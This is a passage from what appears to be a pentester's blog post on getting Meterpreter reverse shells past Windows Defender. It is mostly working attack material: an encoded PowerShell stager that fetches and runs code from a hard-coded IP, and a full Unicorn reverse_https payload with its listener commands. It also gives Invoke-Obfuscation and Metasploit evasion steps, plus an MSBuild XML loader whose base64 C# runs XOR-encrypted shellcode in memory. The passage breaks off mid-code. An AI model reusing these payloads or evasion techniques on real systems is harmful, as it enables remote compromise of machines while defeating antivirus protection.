QAZQByAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAQwAuAFAAUgBvAFgAWQA9AFsAUwBZAHMAVABlAG0ALgBOAGUAdAAuAFcAZQBiAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAGYAQQB1AEwAdABXAGUAQgBQAHIATwB4AFkAOwAkAFcAYwAuAFAAcgBPAHgAWQAuAEMAcgBFAEQARQBOAFQAaQBhAGwAcwAgAD0AIABbAFMAWQBTAFQARQBtAC4ATgBFAHQALgBDAHIAZQBkAGUAbgB0AEkAYQBMAEMAYQBDAGgARQBdADoAOgBEAEUARgBBAFUATAB0AE4ARQBUAFcATwBSAEsAQwByAGUARABlAG4AVABpAGEATABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAEUAWAB0AC4ARQBOAGMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQBUAGUAUwAoACcAbgBsAHsAXwBvAGsAZABhAFAAMAA8AHYAdQBAACwAIwBXADYALQBqAFkAQwB3ADUAcAAuADsAeAApAEgANAA6ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQA4AC4AMQAzADAALgAxADgANwAuADIAMQAzADoANAA0ADMAJwA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAdwBjAC4ASABFAGEARABFAFIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AYwAyAFYAcgB1ADEAbQBPAEQAYQAzAGYAVQBpAFMAVQB3AGsATwByAEQANgBLAEQAbgBEAHMAPQAiACkAOwAkAEQAQQB0AEEAPQAkAFcAQwAuAEQATwB3AE4AbABvAEEAZABEAGEAdABhACgAJABTAEUAcgArACQAdAApADsAJABJAHYAPQAkAGQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAEQAYQBUAGEAWwA0AC4ALgAkAEQAYQB0AEEALgBsAEUATgBHAFQAaABdADsALQBKAG8AaQBuAFsAQwBIAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAQQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

 

4. As an example I have shown the compression method below:

A note on usage, you can apply various rounds of obfuscation and also obfuscate the launcher at the end. If you encounter any problems at any stage you can ‘undo’ the last one that you applied which is really handy. Instead of setting the scriptblock you can set a scriptpath to point to an externally hosted PowerShell script for example. Once you’re done with the obfuscation you can test or run directly from the tool by typing ‘test’ or ‘execute’. At any point you can type ‘show options’ to see what obfuscation or other settings you have in place.

I however prefer to copy and paste the command into a separate PowerShell session to avoid having to go through the whole process of starting the tool. As you can see below this payload was blocked by Defender:

5. I tried various obfuscation techniques shown below (not shown are those obfuscation rounds that resulted in a command that exceeded the maximum length of 8190).

# compress\1# 3 rounds of compress\1
# 5 rounds of compress\1# compress\1 and Launcher\Mshta++\1234567
# compress\1 and Launcher\rundll++\1234567
# compress\1 and Launcher\wmic\1234567
# compress\1 and Launcher\clip\1234567# compress\1 and Launcher\var\1234567

 

None worked. However when I uploaded a file containing the malicious launcher code to VirusTotal no AV engines flagged this as malicious.  I guess Defender is doing some clever run-time checking to detect the malicious activity. The 4th combination above did get past our corporate AV so it is likely that this technique will probably bypass most AV engines.


Unicorn

Not having much luck with finding something that worked (I thought it was going to easy, how wrong I was) a colleague suggested giving Unicorn a try since it had always worked for him onsite. At the time of writing I used version 3.6.10 which you can download from here https://github.com/trustedsec/unicorn. Unicorn ‘is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory’ so I was hopeful.

I generated the standard Meterpreter Reverse HTTPS shell as follows:

python unicorn.py windows/meterpreter/reverse_https <ip> 443

 

Setup the listener with the unicorn.rc file:

use multi/handler
set payload windows/meterpreter/reverse_https
set  LHOST <IP>
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j

 

Payload:

powershell /w 1 /C "s''v xVY -;s''v az e''c;s''v lK ((g''v xVY).value.toString()+(g''v az).value.toString());powershell (g''v lK).value.toString() ('JABDAFIAPQAnACQAdABsAD0AJwAnAFsAdgBZAEQAKAAoACIAbQBzAHYAYwByAHQALgAiACsAIgBkACIAKwAiAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbABnAFMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwB2AFkARAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsACIAKwAiAGwAIgArACIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABGAGgASAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsAdgBZAEQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbAAiACsAIgBsACIAKwAiACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABWAHUAZAApADsAWwB2AFkARAAoACIAbQBzAHYAYwByAHQALgAiACsAIgBkACIAKwAiAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdABsAD0AJAB0AGwALgByAGUAcABsAGEAYwBlACgAIgBGAGgASAAiACwAIAAiAEMAcgBlAGEAdABlAFQAaAByACIAKwAiAGUAIgArACIAYQBkACIAKQA7ACQAdABsAD0AJAB0AGwALgByAGUAcABsAGEAYwBlACgAIgBsAGcAUwAiACwAIAAiAGMAYQBsAGwAIgArACIAbwAiACsAIgBjACIAKQA7ACQAdABsAD0AJAB0AGwALgByAGUAcABsAGEAYwBlACgAIgB2AFkARAAiACwAIAAiAEQAbABsAEkAbQBwACIAKwAiAG8AIgArACIAcgB0ACIAKQA7ACQATABZAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJAB0AGwAIAAtAE4AYQBtAGUAIAAiAFUAeQAiACAALQBuAGEAbQBlAHMAIAB2AGkAbgA7ACQASQB3AD0AIgArAGYAYwAsACsAZQA4ACwAKwA4ADIALAArADAAMAAsACsAMAAwACwAKwAwADAALAArADYAMAAsACsAOAA5ACwAKwBlADUALAArADMAMQAsACsAYwAwACwAKwA2ADQALAArADgAYgAsACsANQAwACwAKwAzADAALAArADgAYgAsACsANQAyACwAKwAwAGMALAArADgAYgAsACsANQAyACwAKwAxADQALAArADgAYgAsACsANwAyACwAKwAyADgALAArADAAZgAsACsAYgA3ACwAKwA0AGEALAArADIANgAsACsAMwAxACwAKwBmAGYALAArAGEAYwAsACsAMwBjACwAKwA2ADEALAArADcAYwAsACsAMAAyACwAKwAyAGMALAArADIAMAAsACsAYwAxACwAKwBjAGYALAArADAAZAAsACsAMAAxACwAKwBjADcALAArAGUAMgAsACsAZgAyACwAKwA1ADIALAArADUANwAsACsAOABiACwAKwA1ADIALAArADEAMAAsACsAOABiACwAKwA0AGEALAArADMAYwAsACsAOABiACwAKwA0AGMALAArADEAMQAsACsANwA4ACwAKwBlADMALAArADQAOAAsACsAMAAxACwAKwBkADEALAArADUAMQAsACsAOABiACwAKwA1ADkALAArADIAMAAsACsAMAAxACwAKwBkADMALAArADgAYgAsACsANAA5ACwAKwAxADgALAArAGUAMwAsACsAMwBhACwAKwA0ADkALAArADgAYgAsACsAMwA0ACwAKwA4AGIALAArADAAMQAsACsAZAA2ACwAKwAzADEALAArAGYAZgAsACsAYQBjACwAKwBjADEALAArAGMAZgAsACsAMABkACwAKwAwADEALAArAGMANwAsACsAMwA4ACwAKwBlADAALAArADcANQAsACsAZgA2ACwAKwAwADMALAArADcAZAAsACsAZgA4ACwAKwAzAGIALAArADcAZAAsACsAMgA0ACwAKwA3ADUALAArAGUANAAsACsANQA4ACwAKwA4AGIALAArADUAOAAsACsAMgA0ACwAKwAwADEALAArAGQAMwAsACsANgA2ACwAKwA4AGIALAArADAAYwAsACsANABiACwAKwA4AGIALAArADUAOAAsACsAMQBjACwAKwAwADEALAArAGQAMwAsACsAOABiACwAKwAwADQALAArADgAYgAsACsAMAAxACwAKwBkADAALAArADgAOQAsACsANAA0ACwAKwAyADQALAArADIANAAsACsANQBiACwAKwA1AGIALAArADYAMQAsACsANQA5ACwAKwA1AGEALAArADUAMQAsACsAZgBmACwAKwBlADAALAArADUAZgAsACsANQBmACwAKwA1AGEALAArADgAYgAsACsAMQAyACwAKwBlAGIALAArADgAZAAsACsANQBkACwAKwA2ADgALAArADYAZQAsACsANgA1ACwAKwA3ADQALAArADAAMAAsACsANgA4ACwAKwA3ADcALAArADYAOQAsACsANgBlACwAKwA2ADkALAArADUANAAsACsANgA4ACwAKwA0AGMALAArADcANwAsACsAMgA2ACwAKwAwADcALAArAGYAZgAsACsAZAA1ACwAKwAzADEALAArAGQAYgAsACsANQAzACwAKwA1ADMALAArADUAMwAsACsANQAzACwAKwA1ADMALAArADYAOAAsACsAMwBhACwAKwA1ADYALAArADcAOQAsACsAYQA3ACwAKwBmAGYALAArAGQANQAsACsANQAzACwAKwA1ADMALAArADYAYQAsACsAMAAzACwAKwA1ADMALAArADUAMwAsACsANgA4ACwAKwBiAGIALAArADAAMQAsACsAMAAwACwAKwAwADAALAArAGUAOAAsACsAYgAwACwAKwAwADAALAArADAAMAAsACsAMAAwACwAKwAyAGYALAArADQANgAsACsANwA1ACwAKwA2AGQALAArADUAMQAsACsANQA5ACwAKwA2ADYALAArADMAMAAsACsANgA1ACwAKwA2ADYALAArADcANQAsACsANgBlACwAKwAzADYALAArADMAMwAsACsANQBmACwAKwA3ADYALAArADYANQAsACsANwAwACwAKwA3ADIALAArADQAMQAsACsANwA0ACwAKwA0ADQALAArADcANwAsACsANAA4ACwAKwA0ADMALAArADUANQAsACsANAA3ACwAKwA2ADcALAArADQAYgAsACsANwA4ACwAKwAwADAALAArADUAMAAsACsANgA4ACwAKwA1ADcALAArADgAOQAsACsAOQBmACwAKwBjADYALAArAGYAZgAsACsAZAA1ACwAKwA4ADkALAArAGMANgAsACsANQAzACwAKwA2ADgALAArADAAMAAsACsAMwAyACwAKwBlADAALAArADgANAAsACsANQAzACwAKwA1ADMALAArADUAMwAsACsANQA3ACwAKwA1ADMALAArADUANgAsACsANgA4ACwAKwBlAGIALAArADUANQAsACsAMgBlACwAKwAzAGIALAArAGYAZgAsACsAZAA1ACwAKwA5ADYALAArADYAYQAsACsAMABhACwAKwA1AGYALAArADYAOAAsACsAOAAwACwAKwAzADMALAArADAAMAAsACsAMAAwACwAKwA4ADkALAArAGUAMAAsACsANgBhACwAKwAwADQALAArADUAMAAsACsANgBhACwAKwAxAGYALAArADUANgAsACsANgA4ACwAKwA3ADUALAArADQANgAsACsAOQBlACwAKwA4ADYALAArAGYAZgAsACsAZAA1ACwAKwA1AD'+'MALAArADUAMwAsACsANQAzACwAKwA1ADMALAArADUANgAsACsANgA4ACwAKwAyAGQALAArADAANgAsACsAMQA4ACwAKwA3AGIALAArAGYAZgAsACsAZAA1ACwAKwA4ADUALAArAGMAMAAsACsANwA1ACwAKwAxADYALAArADYAOAAsACsAOAA4ACwAKwAxADMALAArADAAMAAsACsAMAAwACwAKwA2ADgALAArADQANAAsACsAZgAwACwAKwAzADUALAArAGUAMAAsACsAZgBmACwAKwBkADUALAArADQAZgAsACsANwA1ACwAKwBjAGQALAArADYAOAAsACsAZgAwACwAKwBiADUALAArAGEAMgAsACsANQA2ACwAKwBmAGYALAArAGQANQAsACsANgBhACwAKwA0ADAALAArADYAOAAsACsAMAAwACwAKwAxADAALAArADAAMAAsACsAMAAwACwAKwA2ADgALAArADAAMAAsACsAMAAwACwAKwA0ADAALAArADAAMAAsACsANQAzACwAKwA2ADgALAArADUAOAAsACsAYQA0ACwAKwA1ADMALAArAGUANQAsACsAZgBmACwAKwBkADUALAArADkAMwAsACsANQAzACwAKwA1ADMALAArADgAOQAsACsAZQA3ACwAKwA1ADcALAArADYAOAAsACsAMAAwACwAKwAyADAALAArADAAMAAsACsAMAAwACwAKwA1ADMALAArADUANgAsACsANgA4ACwAKwAxADIALAArADkANgAsACsAOAA5ACwAKwBlADIALAArAGYAZgAsACsAZAA1ACwAKwA4ADUALAArAGMAMAAsACsANwA0ACwAKwBjAGQALAArADgAYgAsACsAMAA3ACwAKwAwADEALAArAGMAMwAsACsAOAA1ACwAKwBjADAALAArADcANQAsACsAZQA1ACwAKwA1ADgALAArAGMAMwAsACsANQBmACwAKwBlADgALAArADYAOQAsACsAZgBmACwAKwBmAGYALAArAGYAZgAsACsAMwAxACwAKwAzADgALAArADIAZQAsACsAMwAxACwAKwAzADMALAArADMAMAAsACsAMgBlACwAKwAzADEALAArADMAOAAsACsAMwA3ACwAKwAyAGUALAArADMAMgAsACsAMwAxACwAKwAzADMALAArADAAMAAiADsAJABMAFkAPQAkAEwAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHYAaQBuACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpACIAKwAiAG8AIgArACIAbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAEkAdwAgAD0AIAAkAEkAdwAuAHIAZQBwAGwAYQBjAGUAKAAiACsAIgAsACIAMAB4ACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAEwAbgA9ADAAeAAxADAAMQAwADsAaQBmACAAKAAkAEkAdwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMQAwACkAewAkAEwAbgA9ACQASQB3AC4ATAB9ADsAJABBAG0APQAkAEwAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADEAMAAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAVgB1AGQAIAA9ACAAMAA7AGYAbwByACgAJABYAEUAPQAwADsAJABYAEUAIAAtAGwAZQAoACQASQB3AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAFgARQArACsAKQB7ACQATABZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAQQBtAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAFgARQApACwAIAAkAEkAdwBbACQAWABFAF0ALAAgADEAKQB9ADsAJABMAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAQQBtACwAIAAwAHgAMQAwADEAMAAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAVgB1AGQAKQA7ACQASgBsAEgAIAA9ACAAIgBDAHIAZQBhAHQAZQBUAGgAcgAiACsAIgBlACIAKwAiAGEAZAAiADsAJABMAFkAOgA6ACQASgBsAEgAKAAwACwAMAB4ADAAMAAsACQAQQBtACwAMAAsADAALAAwACkAOwAnADsAJAB5AGoAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgApACkAOwAkAFIAQQA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABLAEEAPQAiAFcAaQBuAGQAbwB3AHMAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABSAEEAPQAiAEMAOgBcACQASwBBAFwAcwB5AHMAdwBvAHcANgA0AFwAJABLAEEAJABSAEEAXAB2ADEALgAwAFwAJABSAEEAIgB9ADsAaQBlAHgAIAAiACAAJABSAEEAIAAtAGUAIAAkAHkAagAgAC0AbgBvAGUAIgA=')"

 

I uploaded the generated powershell_attack.txt file to VirusTotal. It was flagged as malicious by 10 engines, interestingly not by Defender. I had varying effects when executing the payload in a command prompt. Initially, I could get a reverse shell, but Defender popped up an alert for malicious activity and the shell was unusable. On other occasions a reverse connection could not be established but Defender would not pop up with an alert message to suggest any action had been taken.

I attempted several methods of obfuscation with invoke-obfuscation some of which are shown below but nothing worked or the length was too long! I didn’t try every permutation but it looked unlikely to get past Defender.

# compress\1
# compress\1, token\all\1
# compress\1, token\all\1,Launcher\RunDll++\3457
# 2 and 3 rounds of  compress\1, token\all\1
# 3 rounds of  compress\1, token\all\1 and Launcher\Mshta++\23467
# compress\1, encoding\5  - for AES encryption (all other encoding options generated a payload that execeeded the allowed length)

​​Metasploit 5

One of the new features of Metasploit 5 is the evasion module. More information can be found here: https://github.com/rapid7/metasploit-framework/pull/10759. There are two example modules. The windows executable example (/usr/share/metasploit-framework/modules/evasion/windows/windows_defender_exe.rb) is from the developer’s notes ‘generates an EXE that utilities these techniques: shellcode encryption, code randomization, and a little anti-emulation’.

When used with the default rc4 encryption and windows/meterpreter/reverse_https payload it was at the time of writing detected by 35/70 AV engines. I didn’t look into this any further but perhaps other encryption techniques might have a better result.

You can list the encryption methods as follows:

# msfvenom --list encrypt
Framework Encryption Formats [--encrypt <value>]
================================================
    Name
    ----
    aes256
    base64
    rc4
    xor

 

Basic usage:

# use evasion/windows/windows_defender_exe
# set payload windows/meterpreter/reverse_https
# set LHOST and LPORT# run//Setup your listener
# handler -p windows/meterpreter/reverse_https -H 0.0.0.0 -P 443

 

VirusTotal Output

What did work – nps_payload - Attempt Number 2


Having tried and failed using the aforementioned tools, I finally found a method that got past Windows Defender. Initially, I found a website which dealt specifically with bypassing Defender here: https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus-part-2/. The site lists 3 ways using some variant of the nps_payload mentioned previously. I tried the first two but at the time of writing neither worked against Defender. The third method mentions the use of a forked version of nps_payload but doesn’t actually go on to say how to get it to work. The forked version can be found here https://github.com/fsacer/nps_payload but when using it out of the box gets detected by Defender. I decided to look into this a bit more and found that it was possible to bypass Defender using this tool but some manual modification of the source code was required. What was interesting is that the custom XOR-based encryption applied to the raw payload was not being picked up by Defender. Instead all it took to get past Defender was to modify the using directives in the C# payload using the steps below:

Install the tool and select option 2 to generate the C# payload:

From the msbuild_nps.xml file extract and Base64 decode the payload as shown highlighted below:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">  
  <!-- This inline task executes c# code. -->  
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe nps.xml -->  
  <!-- Original MSBuild Author: Casey Smith, Twitter: @subTee -->  
  <!-- NPS Created By: Ben Ten, Twitter: @ben0xa -->  
  <!-- Created C# payload: Franci Sacer, Twitter: @francisacer1 -->  
  <!-- License: BSD 3-Clause -->  
  <Target Name="npscsharp">   
    <nps />  
  </Target>  
  <UsingTask    TaskName="nps"    TaskFactory="CodeTaskFactory"    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >  
    <Task>      
      <Code Type="Class" Language="cs">        
        <![CDATA[using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; using Microsoft.CSharp; using System.CodeDom.Compiler; using System.Reflection; public class nps: Task, ITask {
          public override bool Execute() {
              Console.WriteLine("hey");
              string cmd = "CnVzaW5nIFN5c3RlbTsKdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwp1c2luZyBTeXN0ZW0uVGV4dDsKcHVibGljIGNsYXNzIENsYXNzRXhhbXBsZQp7CiAgICBwcml2YXRlIHN0YXRpYyBVSW50MzIgTUVNX0NPTU1JVCA9IDB4MTAwMDsKICAgIHByaXZhdGUgc3RhdGljIFVJbnQzMiBQQUdFX1JFQURXUklURSA9IDB4MDQ7CiAgICBwcml2YXRlIHN0YXRpYyBVSW50MzIgUEFHRV9FWEVDVVRFX1JFQUQgPSAweDIwOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHByaXZhdGUgc3RhdGljIGV4dGVybiBVSW50MzIgVmlydHVhbEFsbG9jKFVJbnQzMiBscFN0YXJ0QWRkciwgVUludDMyIHNpemUsIFVJbnQzMiBmbEFsbG9jYXRpb25UeXBlLCBVSW50MzIgZmxQcm90ZWN0KTsKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwcml2YXRlIHN0YXRpYyBleHRlcm4gYm9vbCBWaXJ0dWFsUHJvdGVjdChJbnRQdHIgYWRkcmVzcywgVUludDMyIHNpemUsIFVJbnQzMiBuZXdQcm90ZWN0LCBvdXQgVUludDMyIG9sZFByb3RlY3QpOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgQ3JlYXRlVGhyZWFkKAogICAgICAgIFVJbnQzMiBscFRocmVhZEF0dHJpYnV0ZXMsCiAgICAgICAgVUludDMyIGR3U3RhY2tTaXplLAogICAgICAgIFVJbnQzMiBscFN0YXJ0QWRkcmVzcywKICAgICAgICBJbnRQdHIgcGFyYW0sCiAgICAgICAgVUludDMyIGR3Q3JlYXRpb25GbGFncywKICAgICAgICByZWYgVUludDMyIGxwVGhyZWFkSWQKICAgICk7CiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMiIpXQogICAgcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIFVJbnQzMiBXYWl0Rm9yU2luZ2xlT2JqZWN0KEludFB0ciBoSGFuZGxlLCBVSW50MzIgZHdNaWxsaXNlY29uZHMpOwogICAgcHVibGljIHZvaWQgRXhlY3V0ZSgpIHsKICAgICAgICBzdHJpbmcgcmF3ID0gQCJIenNnRUE4MGRqTUJKalltT1EwZ1VoQm9NZ0JaUlFBZUowUitKekZjRVNVd1dRWnlNek03V0VJd01Uc29OSDRCRVNJUUdqQS9LbkZOTHpra1prQTlBQXM4UXprSUppd0hNVFlJVXlvWU95VmxMVDBKQnpSL0pqRmZNeE5BRkJKekVDTWdPM0VRRUN0aFEwMHdJaGhvQ0F3VUNGNGRQeW96VmhJdVpDZ21aVU50S1RFR0l5MHplMGxyRWp0ME1Ud2ZHVGRBTUdoYkt3OGRHU3BvRUF3aUhIb3lQVEVYSTFzVERRbDNMU3hmVzFnUUlUOEZXaUo0UEN3WVlVSVpLREI1RlRsWFNTOGVHenBVRFJBYllVeGlDbXBlRmg0aFh5eHRUeDFITm5FMUN4MHNSa2NDT2lnZ0lqZ1VOMHcwR2pJWVprWWxKaFF5RGtFN0Zob0ZJaTBqQ3pVek5rQjVNaHNxTHlKbEhqb0JDVHc2RjFaT05pQXhEbFFlSmlzREpnTUZFendhT1JVNUZsVXdIQmNiYVVZOUpROHlVRVFPQVRVa1cxYzBiU3hySERObFJRYzhPd0p5TXhrZ01nVTFMeU40TldnREhuNGhId0ljSVY4MkNqa2VJQ2RjQmxjZERDRWdWQ01mRVNvd2NTWUxLUjU1RlZ3UkN4d09Qa1Y5RGdjRkdFZEhCeFVuTUFrVlhTaEtIQjBwR21FWUd4OGFMV0VmT3hVL2ZqbzdDZzh0YVRZMlpUTWhDeWN2R0RWM1ZnOEFEQUlzVmpnZFB4QllNZ2NIRzBSVEpnNENNamdpUFZZT1ZtQWtJRkVUT1RVdlBIWUlHUzRiQUVBcERYd3NIaHdSWmhraFlod0ZBVFYzVmc0ZUlWOHNiUzgwRkFOeUhDRmtZVXhnTkM4bkRSOFZKd1Z0T0JneEdHSWtDR0o2SlJna0RGd0FCRUlyRVhnNEdERUdZVE11RWdzMGRqTTVMaGtMSlM4Z2JSZ2ZHaHhsWHhGOGZ5OTVKZzFiTmlRaVhBVjRNQmd5Tm1WRkV6d0xCVlk0YkJsM0hCd05JQWtEYlFBL2NSY0dGVGs5Yng0UEloWXNRaWtVRmxaMlN3OS9OMzByQXc5MkJ4VUZIWG80QkN0RE53Z3dRQWc0SGpvWUdGZ3pEVUIzSEE9PSI7CiAgICAgICAgYnl0ZVtdIHNoZWxsY29kZSA9IENvbnZlcnQuRnJvbUJhc2U2NFN0cmluZyh4b3JJdCgiMHRJU051N3JYb1hKdG5iOXlZc3ciLCBCYXNlNjREZWNvZGUocmF3KSkpOwogICAgICAgIFVJbnQzMiBmdW5jQWRkciA9IFZpcnR1YWxBbGxvYygwLCAoVUludDMyKXNoZWxsY29kZS5MZW5ndGgsIE1FTV9DT01NSVQsIFBBR0VfUkVBRFdSSVRFKTsKICAgICAgICBNYXJzaGFsLkNvcHkoc2hlbGxjb2RlLCAwLCAoSW50UHRyKShmdW5jQWRkciksIHNoZWxsY29kZS5MZW5ndGgpOwogICAgICAgIFVJbnQzMiBvbGRQcm90ZWN0OwogICAgICAgIFZpcnR1YWxQcm90ZWN0KChJbnRQdHIpKGZ1bmNBZGRyKSwgKFVJbnQzMilzaGVsbGNvZGUuTGVuZ3RoLCBQQUdFX0VYRUNVVEVfUkVBRCwgb3V0IG9sZFByb3RlY3QpOwogICAgICAgIEludFB0ciBoVGhyZWFkID0gSW50UHRyLlplcm87CiAgICAgICAgVUludDMyIHRocmVhZElkID0gMDsKICAgICAgICBJbnRQdHIgcGluZm8gPSBJbnRQdHIuWmVybzsKICAgICAgICBoVGhyZWFkID0gQ3JlYXRlVGhyZWFkKDAsIDAsIGZ1bmNBZGRyLCBwaW5mbywgMCwgcmVmIHRocmVhZElkKTsKICAgICAgICBXYWl0Rm9yU2luZ2xlT2JqZWN0KGhUaHJlYWQsIDB4RkZGRkZGRkYpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIHhvckl0KHN0cmluZyBrZXksIHN0cmluZyBpbnB1dCkKICAgIHsKICAgICAgICBTdHJpbmdCdWlsZGVyIHNiID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBmb3IoaW50IGk9MDsgaSA8IGlucHV0Lkxlbmd0aDsgaSsrKQogICAgICAgICAgICBzYi5BcHBlbmQoKGNoYXIpKGlucHV0W2ldIF4ga2V5WyhpICUga2V5Lkxlbmd0aCldKSk7CiAgICAgICAgU3RyaW5nIHJlc3VsdCA9IHNiLlRvU3RyaW5nKCk7CiAgICAgICAgcmV0dXJuIHJlc3VsdDsKICAgIH0KCiAgICBwdWJsaWMgc3RhdGljIHN0cmluZyBCYXNlNjRFbmNvZGUoc3RyaW5nIHRleHQpIHsKICAgICAgIHJldHVybiBTeXN0ZW0uQ29udmVydC5Ub0Jhc2U2NFN0cmluZyhTeXN0ZW0uVGV4dC5FbmNvZGluZy5VVEY4LkdldEJ5dGVzKHRleHQpKTsKICAgIH0KCiAgICBwdWJsaWMgc3RhdGljIHN0cmluZyBCYXNlNjREZWNvZGUoc3RyaW5nIGVuY29kZWR0ZXh0KSB7CgkgICAgcmV0dXJuIFN5c3RlbS5UZXh0LkVuY29kaW5nLlVURjguR2V0U3RyaW5nKFN5c3RlbS5Db252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoZW5jb2RlZHRleHQpKTsKICAgIH0KfQ==";
              CSharpCodeProvider nps = new CSharpCodeProvider();
              CompilerParameters parameters = new CompilerParameters();
              parameters.ReferencedAssemblies.Add("System.dll");
              parameters.ReferencedAssemblies.Add("System.Runtime.InteropServices.dll");
              parameters.GenerateExecutable = false;
